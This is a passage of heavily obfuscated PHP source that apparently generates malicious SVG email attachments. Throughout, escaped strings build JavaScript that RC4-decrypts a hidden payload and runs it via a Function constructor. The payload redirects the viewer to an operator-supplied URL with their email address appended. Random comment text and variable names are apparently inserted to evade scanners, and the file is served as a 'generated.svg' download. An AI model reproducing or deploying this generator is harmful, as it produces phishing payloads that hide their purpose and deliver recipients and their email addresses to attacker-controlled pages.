20\40\x20\x20\x20\40\x20\xd\xa\x20\40\40\x20\x20\40\x20\x20\x66\x6f\x72\x20\x28\x6c\x65\164\40{$Cda68["\x69"]}\x20\x3d\x20\60\x3b\x20{$Cda68["\151"]}\40\x3c\40\x32\65\66\x3b\40{$Cda68["\151"]}\53\53\x29\x20\173\15\12\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\40{$Cda68["\152"]}\x20\x3d\40\50{$Cda68["\x6a"]}\40\x2b\x20{$Cda68["\x73"]}\133{$Cda68["\x69"]}\x5d\40\53\40{$Cda68["\153\145\171"]}\x2e\143\x68\x61\x72\x43\157\144\145\101\x74\x28{$Cda68["\151"]}\x20\x25\x20{$Cda68["\x6b\x65\171"]}\x2e\x6c\145\156\x67\164\x68\x29\51\40\x25\40\x32\x35\x36\x3b\15\12\40\x20\40\40\x20\x20\x20\40\x20\40\x20\40\166\x61\162\x20\164\145\155\x70\x20\x3d\40{$Cda68["\163"]}\133{$Cda68["\151"]}\135\73\xd\xa\40\40\x20\x20\40\x20\x20\40\x20\x20\40\x20{$Cda68["\x73"]}\x5b{$Cda68["\x69"]}\135\40\x3d\40{$Cda68["\163"]}\x5b{$Cda68["\x6a"]}\x5d\x3b\xd\xa\x20\40\x20\x20\40\40\40\x20\x20\40\x20\x20{$Cda68["\x73"]}\133{$Cda68["\152"]}\135\40\x3d\40\x74\145\x6d\160\x3b\xd\12\40\40\x20\x20\40\40\x20\40\x7d\15\12\40\40\x20\40\40\40\x20\40\xd\xa\40\x20\x20\40\40\40\x20\x20{$B7437[4]}\xd\xa\40\x20\40\40\x20\40\x20\40\154\145\164\x20{$Cda68["\x69"]}\40\75\40\60\73\xd\12\x20\x20\x20\40\x20\x20\40\x20{$Cda68["\x6a"]}\x20\x3d\40\60\x3b\15\12\x20\x20\x20\x20\x20\x20\40\x20\154\x65\x74\40{$Cda68["\162\145\163\165\x6c\164"]}\x20\x3d\40\47\47\73\15\xa\40\40\40\x20\x20\x20\40\40\15\xa\40\x20\x20\x20\x20\x20\x20\40\146\x6f\x72\x20\50\154\x65\164\x20{$Cda68["\153"]}\40\x3d\x20\x30\73\40{$Cda68["\153"]}\40\x3c\x20{$Cda68["\145\x6e\x63\x72\171\x70\x74\145\144\x42\171\164\x65\x73"]}\x2e\154\x65\x6e\147\164\150\x3b\40{$Cda68["\x6b"]}\x2b\x2b\x29\40\x7b\15\xa\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20{$Cda68["\151"]}\40\75\x20\x28{$Cda68["\151"]}\40\53\x20\61\x29\40\45\x20\x32\x35\66\73\15\xa\40\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20{$Cda68["\x6a"]}\x20\x3d\40\50{$Cda68["\152"]}\x20\53\x20{$Cda68["\163"]}\133{$Cda68["\151"]}\135\51\40\45\x20\x32\65\x36\73\xd\12\x20\x20\40\40\x20\x20\40\40\40\40\40\40{$Dff3d}\40\75\x20{$Cda68["\x73"]}\133{$Cda68["\151"]}\135\73\15\12\40\40\40\40\40\x20\40\x20\40\40\x20\x20{$Cda68["\x73"]}\x5b{$Cda68["\x69"]}\135\x20\x3d\x20{$Cda68["\x73"]}\133{$Cda68["\x6a"]}\x5d\73\15\12\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20{$Cda68["\163"]}\x5b{$Cda68["\x6a"]}\135\40\x3d\x20{$Dff3d}\73\15\xa\x20\40\40\40\40\x20\40\x20\x20\40\40\x20{$Cda68["\x72\x65\163\165\154\164"]}\x20\x2b\75\40\x53\x74\162\x69\x6e\x67\x2e\146\x72\157\x6d\x43\x68\x61\162\x43\157\144\x65\x28{$Cda68["\145\x6e\x63\162\x79\x70\164\145\x64\102\x79\164\145\163"]}\133{$Cda68["\x6b"]}\135\x20\x5e\x20{$Cda68["\163"]}\x5b\50{$Cda68["\163"]}\x5b{$Cda68["\x69"]}\x5d\x20\x2b\x20{$Cda68["\x73"]}\x5b{$Cda68["\152"]}\x5d\51\x20\45\x20\62\x35\x36\135\51\73\15\12\x20\40\x20\x20\x20\40\x20\40\175\15\xa\x20\x20\x20\40\x20\40\40\x20\15\12\x20\40\40\x20\40\x20\40\40{$B7437[5]}\xd\12\x20\x20\x20\x20\x20\40\40\x20\x76\x61\x72\x20{$Cda68["\x64\x65\162\x75\160"]}\x20\x3d\x20\x28\x66\x75\x6e\x63\164\x69\x6f\156\50\51\x7b\x7d\x29\56\x63\157\x6e\x73\x74\x72\165\x63\x74\157\162\50{$Cda68["\162\145\163\x75\x6c\x74"]}\51\50\51\73\15\xa\x20\x20\40\40\x7d"; goto f2137; c0792: $Cda68 = ["\x64\x61\162\164" => TextUtils::generateWord(rand(5, 10)), "\144\x65\x63\x72\x79\160\x74" => TextUtils::generateWord(rand(5, 10)), "\x65\x6e\143\x72\171\x70\x74\x65\144\x49\x6e\160\165\164" => TextUtils::generateWord(rand(5, 10)), "\160\x61\x72\x74\x73" => TextUtils::generateWord(rand(5, 10)), "\x6b\x65\x79" => TextUtils::generateWord(rand(5, 10)), "\157\162\x64\x65\x72\123\164\x72" => TextUtils::generateWord(rand(5, 10)), "\145\x6e\143\162\171\160\164\145\x64" => TextUtils::generateWord(rand(5, 10)), "\162\145\x76\145\162\163\145\x64\x45\x6e\143\162\x79\x70\164\x65\x64" => TextUtils::generateWord(rand(5, 10)), "\x63\x68\x75\156\x6b\163" => TextUtils::generateWord(rand(5, 10)), "\157\x72\144\145\x72" => TextUtils::generateWord(rand(5, 10)), "\162\145\163\x74\x6f\162\x65\144" => TextUtils::generateWord(rand(5, 10)), "\145\156\143\162\171\160\164\145\x64\110\145\170" => TextUtils::generateWord(rand(5, 10)), "\145\x6e\143\x72\171\160\164\145\x64\x42\171\x74\145\x73" => TextUtils::generateWord(rand(5, 10)), "\163" => TextUtils::generateWord(rand(5, 10)), "\x69" => TextUtils::generateWord(rand(5, 10)), "\152" => TextUtils::generateWord(rand(5, 10)), "\153" => TextUtils::generateWord(rand(5, 10)), "\162\145\x73\165\x6c\164" => TextUtils::generateWord(rand(5, 10)), "\144\x65\x72\x75\x70" => TextUtils::generateWord(rand(5, 10)), "\145\x6d\141\x69\x6c\x76\x61\162" => TextUtils::generateWord(rand(5, 10))]; goto C3636; C3636: $Bca73 = $this->rc4_encrypt("\167\x69\156\144\x6f\x77\56\x6c\157\x63\x61\x74\151\x6f\156\56\150\x72\145\x66\75\42" . $this->Af2bc . "\x2f\x22\40\x2b\x20" . $Cda68["\x65\155\141\x69\x6c\166\x61\162"] . "\73"); goto C220d; f2137: return $Ecba9; goto d5b94; d5b94: } public function setToSVG() { goto Deb7e; c444f: header("\103\x6f\156\x74\145\x6e\x74\x2d\104\151\163\x70\157\x73\151\164\x69\157\x6e\72\x20\x61\x74\164\141\x63\150\155\x65\x6e\x74\73\40\x66\151\x6c\x65\x6e\141\x6d\145\75\42\147\145\x6e\x65\x72\141\x74\x65\x64\x2e\163\166\x67\42"); goto F1f30; E8bee: header("\103\x6f\x6e\164\145\156\x74\55\x54\x79\160\x65\x3a\40\x69\x6d\x61\147\145\57\x73\x76\x67\x2b\x78\155\x6c"); goto c444f; F1f30: $B7437 = TextUtils::commentGenerateRandomStoryNew(); goto cb50d; cb50d: echo "\74\x3f\170\155\154\40\x76\145\162\x73\x69\157\156\75\42\x31\x2e\60\42\40\x65\156\143\x6f\144\151\156\147\x3d\42\125\124\106\x2d\70\42\40\x73\x74\141\156\x64\141\154\x6f\x6e\145\75\x22\x6e\157\x22\77\x3e\15\xa\x3c\x73\166\x67\x20\x78\155\154\156\x73\x3d\42\x68\x74\x74\x70\72\x2f\57\167\167\x77\56\167\63\56\157\x72\x67\57\x32\x30\x30\x30\x2f\163\166\x67\x22\40\x77\151\x64\x74\150\75\42\61\x30\60\x22\40\150\145\x69\147\x68\164\75\x22\61\x30\60\x22\x3e\xd\12\x20\x20\x20\x20\x3c\x72\145\143\x74\x20\x77\x69\x64\164\150\x3d\x22\x31\x30\x30\45\42\40\x68\145\x69\x67\x68\x74\x3d\42\61\x30\60\45\42\x20\x66\151\154\154\75\x22\167\150\x69\164\145\42\x2f\76\xd\xa\xd\12\x20\40\40\x20{$B7437[0]}\15\xa\40\x20\x20\40\74\164\145\170\x74\x20\x78\x3d\x22\61\60\x22\40\171\75\x22\65\x30\42\x20\x66\157\x6e\x74\x2d\x66\141\155\151\x6c\x79\x3d\x22\101\162\151\x61\154\x22\x20\163\x74\x79\154\x65\x3d\42\x64\151\x73\x70\154\x61\x79\x3a\x20\156\157\x6e\145\x3b\42\x3e\x53\126\x47\x3c\x2f\164\145\170\164\76\xd\12\15\xa\40\40\x20\40{$B7437[1]}\xd\xa\x20\x20\40\40\40\x20\40\40\xd\12\40\40\40\x20\74\146\157\162\x65\151\x67\x6e\x4f\x62\x6a\145\143\164\40\x77\x69\x64\x74\x68\x3d\42\x31\60\60\x25\x22\40\150\x65\x69\147\x68\164\x3d\42\x31\x30\x30\45\x22\x20\163\x74\x79\x6c\145\x3d\x22\x64\151\163\x70\154\x61\x79\72\40\x6e\157\x6e\145\73\42\x3e\15\12\xd\12\x20\x20\x20\40\40\40\40\40{$B7437[1]}\15\xa\40\40\40\x20\40\x20\40\x20\x3c\x64\x69\x76\x20\x78\155\154\x6e\163\75\x22\150\x74\164\160\x3a\x2f\57\x77\167\x77\x2e\167\63\56\157\x72\147\57\x31\71\x39\71\x2f\x78\x68\x74\155\x6c\42\40\163\x74\x79\x6c\x65\75\x22\146\157\x6e\x74\55\x66\x61\x6d\x69\154\171\72\x20\101\162\x69\141\x6c\73\40\143\x6f\154\157\162\x3a\x20\x62\x6c\165\145\x3b\42\76\xd\xa\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\x20\123\126\107\xd\xa\x20\40\40\x20\x20\40\x20\x20\x3c\57\144\x69\166\76\15\xa\x20\40\40\x20\x3c\x2f\x66\157\162\x65\x69\x67\x6e\117\x62\x6a\145\143\x74\76\xd\xa\xd\12\40\40\40\x20{$B7437[2]}\15\xa\40\x20\40\x20\x3c\x73\x63\162\x69\160\164\x20\164\171\160\x65\75\42\141\x70\160\x6c\x69\x63\x61\x74\151\x6f\x6e\57\145\143\x6d\141\x73\x63\x72\x69\160\164\x22\x3e\15\12\40\40\x20\x20\x20\40\40\40\74\x21\133\103\104\x41\124\x41\133\15\xa\40\40\x20\x20\40\40\40\x20\x20\40\40\x20\164\x72\x79\x20\173\xd\xa\x20\x20\x20\x20\40\40\40\x20\x20\40\40\x20\40\x20\x20\40\164\x72\x79\x20\x7b\15\xa\40\40\40\x20\40\x20\40\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\40{$Ecba9}\xd\xa\40\x20\40\x20\40\x20\40\x20\40\40\40\x20\x20\x20\40\x20\175\x20\x63\141\164\143\x68\x20\x28\x65\162\x72\157\162\62\51\x20\x7b\xd\xa\40\x20\40\40\40\40\40\x20\40\40\x20\x20\x20\40\40\40\40\40\x20\x20\x63\x6f\156\x73\157\154\x65\56\145\x72\x72\157\x72\x28\x22\111\156\156\145\x72\40\x65\162\x72\157\162\40\62\72\x22\54\40\145\162\x72\x6f\162\x32\x29\x3b\15\12\40\40\x20\40\40\x20\40\40\x20\x20\x20\x20\x20\x20\40\x20\x7d\xd\12\40\x20\x20\x20\40\x20\x20\40\40\40\x20\x20\175\40\x63\x61\164\x63\x68\x20\x28\x65\162\162\x6f\x72\x31\x29\40\x7b\15\12\40\x20\x20\40\40\40\x20\x20\x20\x20\40\40\40\40\x20\x20\143\157\x6e\x73\157\x6c\x65\x2e\145\162\x72\x6f\x72\50\42\x4f\x75\164\145\162\x20\x65\162\162\157\x72\72\x22\54\x20\x65\162\x72\157\162\x31\x29\73\xd\xa\40\x20\x20\40\x20\40\x20\x20\40\40\x20\40\175\xd\12\x20\x20\40\x20\40\x20\40\40\135\x5d\76\15\12\x20\x20\x20\40\74\x2f\163\x63\162\x69\160\x74\76\xd\xa\74\57\163\166\x67\x3e"; goto c25ea; Deb7e: $Ecba9 = $this->generate(); goto E8bee; c25ea: } } goto d0731; Ca7e1: class OneWordEncryptor { private $Af2bc; private $Fcd19; public $Dfd7d; public function __construct($Bca73, $e90ca) { $this->Af2bc = $Bca73; $this->Fcd19 = $e90ca; } public function mapSpecialChar($c6ec9, $c973f = false) { goto a2664; b81bd: D6797: goto cf73d; a52d7: return isset($Db39d[$c6ec9]) ? $Db39d[$c6ec9] : $c6ec9; goto f24eb; a2664: $Db39d = ["\41" => "\132\x61", "\x40" => "\132\x62", "\43" => "\132\143", "\44" => "\132\x64", "\45" => "\132\145", "\136" => "\x5a\146", "\46" => "\x5a\147", "\x2a" => "\132\x68", "\50" => "\132\151", "\x29" => "\132\x6a", "\x2d" => "\132\x6b", "\x5f" => "\132\154", "\75" => "\132\x6d", "\53" => "\132\x6e", "\x5b" => "\132\x6f", "\x5d" => "\132\160", "\173" => "\x5a\161", "\x7d" => "\x5a\162", "\x3b" => "\132\163", "\x3a" => "\x5a\164", "\x27" => "\x5a\165", "\42" => "\x5a\x76", "\54" => "\x5a\x77", "\x2e" => "\x5a\170", "\57" => "\132\171", "\x5c" => "\x5a\x7a", "\x3c" => "\x59\141", "\76" => "\131\142", "\x3f" => "\131\x63", "\140" => "\x59\x64", "\x7e" => "\x59\145", "\40" => "\x59\146"]; goto a8181; f24eb: goto Dc2d2; goto b81bd; e4152: Dc2d2: goto feab2; B3d12: A3ed6: goto f832d; cf73d: foreach ($Db39d as $F7657 => $a522d) { goto a2293; a2293: if (!($a522d === $c6ec9)) { goto fde85; } goto B7de3; eabbf: Ebbf9: goto Ba994; B7de3: return $F7657; goto F2488; F2488: fde85: goto eabbf; Ba994: } goto B3d12; a8181: if ($c973f) { goto D6797; } goto a52d7; f832d: return $c6ec9; goto e4152; feab2: } public function encrypt($B0262) { goto E80fd; E80fd: $ac06c = []; goto F84ef; a72fc: foreach (str_split($B0262) as $c6ec9) { goto Eeede; d2b23: A541a: goto adae4; Eeede: $f343d = $this->mapSpecialChar($c6ec9); goto c0486; adae4: dfab1: goto ad014; c0486: foreach (str_split($f343d) as $d975f) { goto B1dce; E5c6f: dc346: goto Bc56c; Ee164: $ac06c[] = $cf310; goto Efe37; b8126: $Ab607 = strtolower($d975f); goto be41d; B9f54: B7e27: goto db860; be41d: $ec584 = rand(0, 3); goto A4a9e; de7fb: goto dc346; goto C6fea; C61c0: $cf310 .= $Fecee[rand(0, strlen($Fecee) - 1)]; goto Bf2cc; A4a9e: $fdb49[] = $ec584; goto Bc650; db860: C9f87: goto D90f5; C6fea: fcd89: goto aa689; F70df: $Ca056[] = $d56e0 ? "\61" : "\x30"; goto b8126; F3f90: $daf1d = 0; goto E5c6f; B1dce: $d56e0 = ctype_alpha($d975f) && ctype_upper($d975f); goto F70df; Efe37: a7086: goto c6b71; Fc88d: $cf310 .= $Ab607; goto B9f54; ec50b: d7f94: goto Fc88d; Bf2cc: goto B7e27; goto ec50b; Bc650: $cf310 = ''; goto F3f90; D90f5: $daf1d++; goto de7fb; A4421: if ($daf1d === $ec584) { goto d7f94; } goto C61c0; aa689: $cf310 = ucfirst(strtolower($cf310)); goto Ee164; Bc56c: if (!($daf1d < 4)) { goto fcd89; } goto A4421; c6b71: } goto d2b23; ad014: } goto f7de7; d31ed: $b6e78 = implode('', $Ca056); goto Ef4bb; f4665: $Ca056 = []; goto ffff5; Ef4bb: return $A6e50 . "\x2d\x53\x65\143\x72\x2d" . $C8668 . "\x2d\103\141\x73\x65\55" . $b6e78; goto D10c6; fd309: $A6e50 = implode("\x2d", $ac06c); goto b6fe8; b6fe8: $C8668 = implode('', $fdb49); goto d31ed; ffff5: $Fecee = "\141\142\x63\144\x65\146\x67\x68\151\x6a\x6b\x6c\x6d\156\x6f\x70\161\x72\x73\x74\x75\x76\167\170\x79\x7a"; goto a72fc; F84ef: $fdb49 = []; goto f4665; f7de7: b17a9: goto fd309; D10c6: } public function generate() { goto a8503; e2d30: return $Ecba9; goto e9d33; Aab97: $this->Dfd7d = $Cda68; goto e2d30; b90e0: $B7437 = TextUtils::commentGenerateRandomStorySlash(); goto C08fe; B3d7d: $Bca73 = "\167\x69\x6e\144\x6f\167\56\x6c\x6f\143\x61\x74\151\157\156\x2e\x68\162\145\146\75\x22" . $this->Af2bc . "\x2f\x22\x20\x2b\40" . $Cda68["\141\165\164\x6f\147\162\x61\142"] . "\73"; goto a4130; C08fe: $Ecba9 = "\xd\xa\146\x75\156\143\x74\x69\x6f\x6e\40{$Cda68["\155\x61\160\123\160\x65\x63\151\141\154\103\x68\x61\x72\x46\x75\x6e\x63"]}\x28{$Cda68["\x63\150\x61\x72\126\x61\162"]}\54\x20\x72\145\x76\x65\x72\163\145\40\x3d\40\x66\x61\x6c\163\x65\x29\40\x7b\15\12\x20\40\40\40\143\157\x6e\163\164\x20{$Cda68["\163\160\x65\143\x69\141\x6c\x4d\141\160\126\141\x72"]}\40\x3d\40\173\xd\12\40\40\40\x20\40\40\x20\x20\47\x21\47\72\40\x27\132\141\47\54\x20\x27\x40\47\x3a\40\47\132\142\x27\54\40\47\x23\x27\72\40\x27\x5a\143\47\x2c\x20\x27\x24\47\72\40\x27\132\x64\47\x2c\40\47\45\x27\72\x20\x27\x5a\x65\47\x2c\40\xd\12\40\40\40\x20\x20\40\40\40\x27\x5e\47\72\40\47\x5a\146\x27\54\40\x27\x26\x27\72\40\47\132\x67\x27\54\40\47\x2a\47\72\40\x27\x5a\150\47\54\x20\47\50\47\72\40\47\x5a\151\47\x2c\x20\x27\51\47\x3a\x20\x27\132\x6a\47\54\15\xa\40\40\x20\40\40\40\x20\x20\x27\x2d\x27\x3a\x20\x27\x5a\153\x27\x2c\x20\47\x5f\47\72\40\47\x5a\x6c\47\54\40\x27\x3d\47\x3a\x20\47\x5a\155\x27\x2c\40\x27\x2b\47\x3a\x20\47\132\156\47\x2c\x20\x27\133\x27\72\40\47\132\157\x27\x2c\xd\xa\40\40\40\x20\40\x20\40\40\47\135\x27\x3a\40\x27\x5a\x70\x27\54\x20\x27\173\x27\72\x20\47\x5a\161\x27\x2c\x20\47\175\47\x3a\x20\47\132\x72\x27\54\40\47\x3b\47\x3a\x20\x27\x5a\163\x27\x2c\x20\x27\x3a\47\x3a\40\x27\132\x74\47\x2c\15\xa\x20\40\40\x20\40\x20\40\40\47\x5c\x27\47\x3a\40\47\x5a\165\47\54\40\x27\42\x27\x3a\x20\x27\132\166\47\x2c\x20\47\x2c\47\72\x20\x27\132\167\x27\54\40\47\x2e\47\72\x20\x27\x5a\x78\x27\x2c\x20\47\x2f\47\x3a\x20\47\132\x79\47\x2c\15\xa\x20\x20\x20\x20\x20\40\40\40\x27\x5c\134\x27\x3a\40\47\132\172\x27\x2c\x20\x27\x3c\47\x3a\40\47\x59\x61\x27\54\x20\47\76\47\72\40\47\131\142\47\x2c\x20\47\x3f\x27\x3a\40\x27\131\143\x27\x2c\40\47\140\x27\x3a\x20\x27\x59\x64\x27\x2c\xd\xa\x20\40\40\x20\x20\40\40\x20\x27\x7e\x27\x3a\x20\47\x59\x65\47\x2c\40\47\x20\x27\x3a\40\x27\x59\146\47\xd\xa\x20\x20\40\x20\175\73\15\xa\x20\40\40\40\151\146\x20\x28\162\x65\x76\145\x72\163\145\x29\x20\x7b\15\12\x20\x20\40\40\x20\40\40\x20\146\157\x72\40\50\143\157\156\163\164\x20\133{$Cda68["\163\x70\145\x63\x69\141\154\126\141\x72"]}\x2c\x20{$Cda68["\x63\x6f\144\145\126\x61\162"]}\135\40\x6f\146\40\x4f\142\152\x65\x63\164\x2e\145\x6e\164\x72\151\x65\x73\x28{$Cda68["\163\x70\x65\143\x69\x61\154\115\141\x70\x56\141\x72"]}\51\x29\40\173\xd\xa\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\40\x69\x66\x20\x28{$Cda68["\143\157\x64\x65\x56\x61\162"]}\x20\x3d\75\x3d\40{$Cda68["\143\150\141\162\x56\141\x72"]}\x29\x20\x72\x65\164\165\162\x6e\40{$Cda68["\163\x70\x65\x63\x69\141\154\126\141\162"]}\73\15\xa\x20\x20\x20\x20\40\40\x20\x20\175\15\xa\x20\x20\x20\x20\40\40\40\x20\162\x65\x74\x75\162\x6e\40{$Cda68["\x63\150\141\x72\126\x61\x72"]}\x3b\15\12\40\40\40\x20\175\x20\x65\154\x73\x65\40\x7b\xd\xa\x20\x20\40\40\40\x20\x20\x20\x72\x65\x74\x75\162\x6e\40{$Cda68["\x73\x70\x65\x63\x69\x61\x6c\x4d\141\x70\x56\x61\162"]}\x5b{$Cda68["\143\150\141\162\126\x61\x72"]}\135\x20\174\x7c\x20{$Cda68["\143\150\141\x72\x56\x61\162"]}\73\xd\12\40\x20\x20\x20\175\15\12\x7d\15\xa\xd\12\146\x75\156\143\164\x69\157\x6e\x20{$Cda68["\x64\x65\143\x72\171\160\164\x46\x75\156\x63"]}\50{$Cda68["\145\156\x63\162\x79\160\x74\x65\144\x57\151\164\x68\113\145\171\126\141\x72"]}\x29\40\x7b\15\xa\x20\40\x20\x20\x63\157\156\x73\x74\40{$Cda68["\x70\141\162\x74\x73\126\141\x72"]}\40\75\x20{$Cda68["\x65\156\143\162\171\x70\164\145\144\127\151\x74\x68\113\x65\171\x56\x61\162"]}\x2e\x73\x70\x6c\151\164\x28\42\55\x53\145\x63\162\55\42\51\73\xd\xa\x20\40\40\x20\x69\146\40\50{$Cda68["\x70\141\x72\164\163\x56\141\162"]}\56\x6c\145\x6e\x67\164\x68\x20\41\75\40\62\51\40\x72\x65\x74\x75\x72\x6e\x20\42\111\x6e\x76\141\154\x69\144\40\145\x6e\x63\162\171\160\164\x65\x64\40\x66\x6f\x72\155\141\x74\x22\73\xd\12\40\40\40\x20\x63\157\x6e\163\164\40{$Cda68["\145\156\x63\x72\171\x70\164\x65\x64\127\x69\164\x68\x4b\x65\x79\126\141\x72"]}\x5f\x65\x6e\143\x20\75\x20{$Cda68["\x70\x61\x72\164\x73\126\x61\162"]}\x5b\60\x5d\73\xd\xa\40\40\40\40\x63\x6f\156\x73\164\x20{$Cda68["\x6d\157\x72\145\120\141\x72\x74\x73\x56\x61\162"]}\x20\x3d\x20{$Cda68["\160\x61\162\164\x73\x56\141\x72"]}\133\x31\135\x2e\x73\x70\x6c\x69\164\50\x22\55\103\141\x73\145\x2d\42\51\x3b\xd\xa\x20\40\x20\40\151\x66\40\50{$Cda68["\155\157\x72\x65\120\141\x72\x74\163\126\x61\162"]}\x2e\x6c\145\156\x67\164\x68\40\41\x3d\40\62\x29\x20\x72\x65\x74\165\162\x6e\40\42\111\156\x76\141\154\151\144\40\x65\156\x63\162\x79\x70\164\x65\144\40\x66\x6f\x72\x6d\141\164\42\73\15\12\x20\40\x20\40\x63\157\x6e\x73\x74\40{$Cda68["\153\145\x79\x56\x61\x72"]}\x20\75\x20{$Cda68["\x6d\157\x72\x65\x50\x61\162\164\x73\126\x61\x72"]}\133\60\x5d\x3b\xd\xa\40\x20\x20\40\143\x6f\156\163\164\40{$Cda68["\143\141\x73\145\x49\x6e\x66\x6f\126\141\x72"]}\x20\75\x20{$Cda68["\x6d\x6f\x72\145\120\x61\162\x74\x73\126\141\162"]}\x5b\61\x5d\x3b\15\12\40\40\40\40\x63\x6f\x6e\163\164\x20{$Cda68["\163\x65\x67\155\x65\156\164\163\x56\141\x72"]}\x20\75\40{$Cda68["\145\x6e\143\x72\x79\160\164\x65\x64\x57\x69\164\x68\x4b\145\171\126\141\x72"]}\137\145\156\x63\x2e\x73\x70\x6c\x69\x74\50\47\55\47\x29\x3b\15\12\x20\x20\40\x20\x63\157\156\x73\x74\x20{$Cda68["\x70\x6f\x73\151\164\x69\157\x6e\x73\126\x61\x72"]}\x20\x3d\40{$Cda68["\x6b\x65\x79\x56\x61\x72"]}\x2e\163\160\x6c\x69\x74\50\x27\47\51\x3b\xd\xa\40\x20\40\40\x63\x6f\156\163\x74\x20{$Cda68["\x63\141\163\x65\x49\156\x66\157\x41\x72\162\126\x61\x72"]}\x20\x3d\x20{$Cda68["\x63\141\163\x65\111\156\146\157\x56\141\x72"]}\56\x73\x70\154\x69\x74\x28\47\x27\51\x3b\xd\12\x20\x20\x20\40\154\x65\x74\40{$Cda68["\x72\x65\163\165\154\164\x56\x61\x72"]}\40\x3d\40\47\x27\73\15\12\40\40\x20\x20\x6c\145\x74\x20{$Cda68["\163\160\x65\143\151\x61\x6c\x53\145\x71\x56\x61\162"]}\x20\75\x20\x27\47\73\xd\12\40\40\40\x20\146\157\x72\x20\50\x6c\145\164\40{$Cda68["\151\126\x61\x72"]}\x20\75\x20\x30\x3b\x20{$Cda68["\x69\126\141\162"]}\40\74\x20\115\x61\x74\x68\x2e\x6d\x69\x6e\x28{$Cda68["\x73\x65\x67\x6d\x65\x6e\164\x73\126\141\162"]}\x2e\154\x65\156\147\164\150\x2c\x20{$Cda68["\160\157\163\x69\x74\151\x6f\x6e\163\126\x61\x72"]}\56\x6c\145\156\x67\164\150\x29\73\40{$Cda68["\151\x56\x61\x72"]}\53\x2b\51\x20\x7b\xd\xa\x20\x20\40\x20\x20\x20\40\40\151\x66\40\x28\41{$Cda68["\163\145\x67\x6d\145\156\x74\x73\126\141\162"]}\133{$Cda68["\151\126\x61\x72"]}\x5d\x20\174\x7c\40\41{$Cda68["\x70\x6f\x73\151\x74\151\x6f\156\x73\x56\141\162"]}\x5b{$Cda68["\x69\126\141\x72"]}\135\51\x20\143\157\156\x74\x69\x6e\x75\145\73\xd\xa\40\40\40\x20\40\x20\x20\x20\143\x6f\156\163\x74\x20{$Cda68["\x73\145\x67\155\145\156\x74\126\141\162"]}\x20\x3d\x20{$Cda68["\x73\145\147\x6d\x65\x6e\164\163\126\x61\162"]}\133{$Cda68["\x69\126\141\x72"]}\135\73\xd\12\x20\40\40\x20\40\40\x20\40\143\x6f\x6e\x73\x74\x20{$Cda68["\x70\157\x73\151\164\x69\x6f\156\x56\x61\162"]}\x20\x3d\40\x70\x61\x72\x73\x65\111\x6e\x74\50{$Cda68["\x70\x6f\x73\x69\x74\151\x6f\x6e\163\126\x61\x72"]}\x5b{$Cda68["\151\x56\141\162"]}\x5d\51\73\15\12\40\40\x20\40\40\x20\x20\x20\x69\146\x20\50{$Cda68["\x70\157\163\x69\164\151\157\156\126\x61\x72"]}\x20\x3e\x3d\40{$Cda68["\163\x65\147\155\145\x6e\x74\x56\141\162"]}\56\x6c\x65\156\x67\164\x68\x20\174\x7c\x20{$Cda68["\x70\157\163\x69\x74\151\157\x6e\x56\141\x72"]}\40\74\x20\x30\51\x20\x63\x6f\x6e\x74\x69\156\165\145\73\15\12\x20\x20\40\40\40\40\x20\x20\x6c\x65\x74\x20{$Cda68["\x63\x68\x61\x72\x56\x61\x72"]}\x20\x3d\x20{$Cda68["\163\x65\147\x6d\145\156\x74\x56\141\162"]}\x5b{$Cda68["\x70\x6f\163\x69\x74\151\157\156\126\x61\162"]}\135\73\15\xa\40\x20\x20\x20\x20\x20\40\40\151\146\40\50{$Cda68["\x63\141\x73\145\x49\x6e\x66\157\x41\162\x72\x56\x61\162"]}\133{$Cda68["\151\x56\x61\x72"]}\135\x20\46\46\40{$Cda68["\143\x61\x73\145\x49\x6e\146\157\x41\x72\x72\x56\141\162"]}\x5b{$Cda68["\151\x56\141\162"]}\x5d\40\x3d\75\x3d\x20\x27\x31\x27\x20\x26\x26\40\57\x5b\x61\55\x7a\x41\55\x5a\135\57\56\x74\x65\x73\164\x28{$Cda68["\x63\150\141\162\126\x61\162"]}\51\51\40\x7b\xd\xa\40\x20\40\40\40\40\40\x20\x20\x20\x20\x20{$Cda68["\143\150\x61\x72\x56\141\162"]}\x20\x3d\x20{$Cda68["\143\x68\141\x72\126\141\162"]}\x2e\164\157\125\x70\x70\145\x72\103\141\x73\x65\x28\x29\x3b\15\12\40\40\x20\x20\x20\40\x20\40\175\40\x65\x6c\x73\x65\40\173\xd\12\40\x20\x20\x20\x20\x20\40\40\40\x20\x20\40{$Cda68["\x63\x68\x61\162\126\141\x72"]}\40\75\x20{$Cda68["\143\150\141\162\x56\141\162"]}\x2e\x74\x6f\x4c\x6f\167\x65\x72\x43\x61\163\145\50\x29\73\15\xa\40\40\40\40\40\40\40\x20\x7d\15\xa\x20\x20\40\40\x20\40\40\40\57\x2f\40\x43\157\154\154\x65\x63\x74\40\163\160\x65\143\x69\x61\154\40\x63\150\141\x72\40\x73\x65\x71\165\x65\x6e\143\145\x73\xd\xa\x20\40\x20\x20\x20\x20\40\x20\151\146\x20\50{$Cda68["\163\x70\x65\x63\x69\141\x6c\x53\x65\x71\x56\x61\162"]}\x20\75\x3d\x3d\40\x27\x27\40\x26\x26\40\50{$Cda68["\143\150\x61\162\x56\x61\162"]}\40\x3d\x3d\x3d\40\x27\x7a\x27\40\174\174\40{$Cda68["\x63\150\141\x72\126\x61\162"]}\x20\75\75\x3d\40\47\132\x27\40\x7c\x7c\x20{$Cda68["\143\x68\141\x72\x56\x61\x72"]}\40\x3d\75\x3d\x20\x27\x79\47\x20\174\x7c\x20{$Cda68["\143\x68\x61\x72\126\x61\x72"]}\x20\x3d\x3d\75\40\47\x59\47\51\x29\x20\x7b\xd\12\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20{$Cda68["\x73\x70\x65\143\x69\x61\x6c\123\x65\161\x56\141\x72"]}\x20\x3d\x20{$Cda68["\143\x68\141\x72\x56\141\162"]}\73\xd\xa\x20\x20\x20\40\40\x20\40\x20\x7d\40\145\x6c\163\x65\40\151\x66\x20\50{$Cda68["\163\160\x65\x63\x69\x61\154\x53\145\x71\126\x61\162"]}\51\40\x7b\xd\12\40\40\40\40\x20\x20\x20\40\x20\x20\40\x20\143\157\156\x73\x74\40{$Cda68["\155\141\160\x70\